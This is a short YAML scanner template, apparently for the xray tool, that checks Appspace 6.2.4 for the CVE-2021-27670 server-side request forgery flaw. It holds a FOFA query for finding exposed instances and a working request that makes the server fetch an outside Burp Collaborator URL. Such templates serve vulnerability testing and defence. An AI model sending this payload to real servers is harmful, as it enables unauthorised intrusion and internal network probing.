id: CVE-2021-27670

info:
  name: Appspace jsonprequest SSRF漏洞 CVE-2021-27670
  author: daffainfo
  severity: high
  description: |
    Appspace 6.2.4存在漏洞，允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造，危害系统安全。
    fofa-query: "Sign-in-to-Appspace-Core"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Appspace%20jsonprequest%20SSRF%E6%BC%8F%E6%B4%9E%20CVE-2021-27670.md

rules:
  r0:
    request:
      method: GET
      path: /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http%3a%2f%2fkui5ntipd353w4eekwtxhc5af1lu9oxe158ywn.burpcollaborator.net%3f
    expression: response.status == 200 && response.body.bcontains(b'dlgnon6ksjta2ya1tg7gq2zjlgmgiwjzlgz')
expression: r0()